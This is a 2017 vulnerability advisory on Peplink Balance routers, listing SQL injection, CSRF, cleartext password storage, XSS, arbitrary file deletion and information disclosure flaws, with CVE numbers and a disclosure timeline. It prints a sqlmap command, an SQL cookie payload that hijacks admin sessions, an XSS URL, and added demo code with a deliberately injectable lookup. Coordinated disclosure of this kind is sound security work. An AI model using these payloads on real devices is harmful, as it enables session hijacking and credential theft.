Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure

Author: X41 D-Sec GmbH
Platform: cgi
Release date: 2017-06-06

X41 D-Sec GmbH Security Advisory: X41-2017-005

Multiple Vulnerabilities in Peplink Balance Routers
===================================================

Overview
--------
Confirmed Affected Versions: 7.0.0-build1904
Confirmed Patched Versions:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.1-build2093.bin
Vulnerable Firmware:
fw-b305hw2_380hw6_580hw2_710hw3_1350hw2_2500-7.0.0-build1904.bin
Models: Balance Routers 305, 380, 580, 710, 1350, 2500
Vendor: Peplink
Vendor URL: https://www.peplink.com/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn
Additional Credits: Claus Overbeck (Abovo IT)
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-005-peplink/


Summary and Impact
------------------
Several issues have been identified that allow attackers to access the
administrative web interface with admin credentials, delete files, and
perform CSRF and XSS attacks.


Product Description
-------------------
From the vendor webpage:
Use Load Balancing and SpeedFusion bandwidth bonding to deliver
superfast VoIP, video streaming, and data using an SD-WAN enabled
network. Even with a basic Balance 20 dual-WAN router, you can mix
different transport technologies and providers to keep your network up
when individual links go down. Switching between links is automatic and
seamless.



SQL Injection via bauth Cookie
==============================
Severity Rating: Critical
Vector: Network
CVE: CVE-2017-8835
CWE: 89
CVSS Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary and Impact
------------------
Peplink devices are vulnerable to an SQL injection attack via the bauth
cookie parameter, which is set, for example, when accessing
https://ip/cgi-bin/MANGA/admin.cgi.

The injection can be checked with the following command:

./sqlmap.py -u "https://ip/cgi-bin/MANGA/admin.cgi"
--cookie="bauth=csOWLxU4BvoMfhY2rHLVFm1EmZWV74zinla9IVclqrYxH16426647"
-p"bauth" --level 5 --risk 3 --dbms sqlite --technique=BEUSQ
--flush-session -t trace.log --prefix "'" --suffix "--" -a

The vulnerability in the Peplink device allows access to the SQLite
session database containing user and session variables. By using the
following cookie in a web request, it is possible to select a running
administrator session to be used for the attacker's login.

bauth=-12' or id IN (select s.id from sessions as s left join
sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1')
or '1'='2

By crafting specialised SQL queries, it is possible to retrieve usernames
from the database. This worked by returning a valid session if the
username existed and no session if it did not. In the first case the
server did not set a new session cookie in the response to the request.

SELECT id FROM sessions WHERE sessionid = '-14' or id IN (select s.id
from sessions as s left join sessionsvariables as v on v.id=s.id where
v.name='username' and substr(v.value,1,3)='adm')

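As an added illustration that is not part of the advisory, the lookup pattern behind the queries quoted above rebuilt against a constructed SQLite session store: the concatenating lookup beside a parameter-bound one, fed the advisory's hijack cookie. The table and column names come from the advisory's queries; the rows, the session token and the function names are made up.

```python
import sqlite3

# Constructed stand-in for the router's SQLite session store. Table and column
# names (sessions, sessionsvariables, id, sessionid, name, value) are taken from
# the queries quoted in the advisory; the rows and the token are made up.
VALID_TOKEN = "constructed-admin-session-token"

def make_session_db():
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE sessions (id INTEGER PRIMARY KEY, sessionid TEXT);
        CREATE TABLE sessionsvariables (id INTEGER, name TEXT, value TEXT);
        INSERT INTO sessions VALUES (1, '{VALID_TOKEN}');
        INSERT INTO sessionsvariables VALUES (1, 'username', 'admin'), (1, 'rwa', '1');
    """)
    return db

# Vulnerable lookup: the raw bauth cookie is spliced into the SQL text, so a
# quote character in the cookie changes the structure of the query.
def lookup_session_vulnerable(db, bauth):
    sql = "SELECT id FROM sessions WHERE sessionid = '" + bauth + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

# Hardened lookup: the cookie is bound as a parameter and can only ever be
# compared as a value, never interpreted as SQL.
def lookup_session_fixed(db, bauth):
    row = db.execute("SELECT id FROM sessions WHERE sessionid = ?", (bauth,)).fetchone()
    return row[0] if row else None

# The session-hijack cookie value quoted in the advisory.
HIJACK = ("-12' or id IN (select s.id from sessions as s left join "
          "sessionsvariables as v on v.id=s.id where v.name='rwa' and v.value='1') "
          "or '1'='2")

def demo():
    """Return (vulnerable result, fixed result) for the advisory's cookie."""
    db = make_session_db()
    return lookup_session_vulnerable(db, HIJACK), lookup_session_fixed(db, HIJACK)

if __name__ == "__main__":
    # (1, None): only the concatenating lookup hands out the admin session
    print(demo())
```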


Workarounds
-----------
Install vendor supplied update.


No CSRF Protection
==================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8836
CWE: 352
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
The CGI scripts in the administrative interface are not protected
against cross-site request forgery attacks. This allows an attacker to
execute commands if a logged-in user visits a malicious website. This
can, for example, be used to change the credentials of the administrative
web interface.


Workarounds
-----------
Install vendor supplied update.




Passwords stored in Cleartext
=============================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8837
CWE: 256
CVSS Score: 4.0
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
The Peplink devices store passwords in cleartext in the files
/etc/waipass and /etc/roapass. If one of these devices is compromised,
the attacker can gain access to the cleartext passwords and abuse them to
compromise further systems.


Workarounds
-----------
Install vendor supplied update.




XSS via syncid Parameter
========================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8838
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the syncid
parameter to trigger a cross-site scripting issue by calling
https://ip/cgi-bin/HASync/hasync.cgi?debug=1&syncid=123%3Cscript%3Ealert%281%29%3C/script%3E

This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.




XSS via preview.cgi
===================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8839
CWE: 80
CVSS Score: 5.4
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary and Impact
------------------
If the web interface is accessible, it is possible to abuse the
orig_url parameter to trigger a cross-site scripting issue in
/guest/preview.cgi. The injection lands directly inside existing JavaScript.

This executes the JavaScript in the victim's browser, which can be abused
to steal session cookies.

Workarounds
-----------
Install vendor supplied update.



File Deletion
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8841
CWE: 73
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Summary and Impact
------------------
A logged-in user can delete arbitrary files on the Peplink devices by
abusing /cgi-bin/MANGA/firmware_process.cgi. When an absolute path is
provided in the upfile.path parameter, the file at that path is deleted
during the process. This can be abused to cause a denial of service
(DoS). In combination with the missing CSRF protection, this can be
abused remotely via a logged-in user.

Workarounds
-----------
Install vendor supplied update.




Information Disclosure
======================
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-8840
CWE: 200
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Summary and Impact
------------------
If the web interface is accessible, it is possible to retrieve sensitive
information without a valid login by opening
cgi-bin/HASync/hasync.cgi?debug=1

This displays the following:

-----8<------------------------------------------------
Master LAN Address    = [ <internal ip> / <netmask> ]
Serial Number         = [ <serial number> ]
HA Group ID           = [ <group id> ]
Virtual IP            = [ <internal ip> / <netmask> ]
Submitted syncid      = [ <syncid> ]
-----8<------------------------------------------------

This information can be valuable for an attacker to exploit other issues.

Workarounds
-----------
Install vendor supplied update.




About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.

Timeline
--------
2017-04-07	Issue found
2017-04-10	Vendor asked for security contact
2017-04-11	Vendor replied, sent GPG key
2017-04-11	Information supplied to vendor
2017-04-11	Vendor acknowledges that the information is received
2017-04-17	Vendor acknowledges SQL injection
2017-05-08	CVE IDs for all issues requested
2017-05-08	CVE IDs assigned
2017-05-11	Vendor informed about CVE IDs
2017-05-29	Version provided to X41 for testing
2017-05-31	First test results sent back to the vendor
2017-06-01	Remaining test results sent back to the vendor
2017-06-05	Coordinated Firmware and Advisory release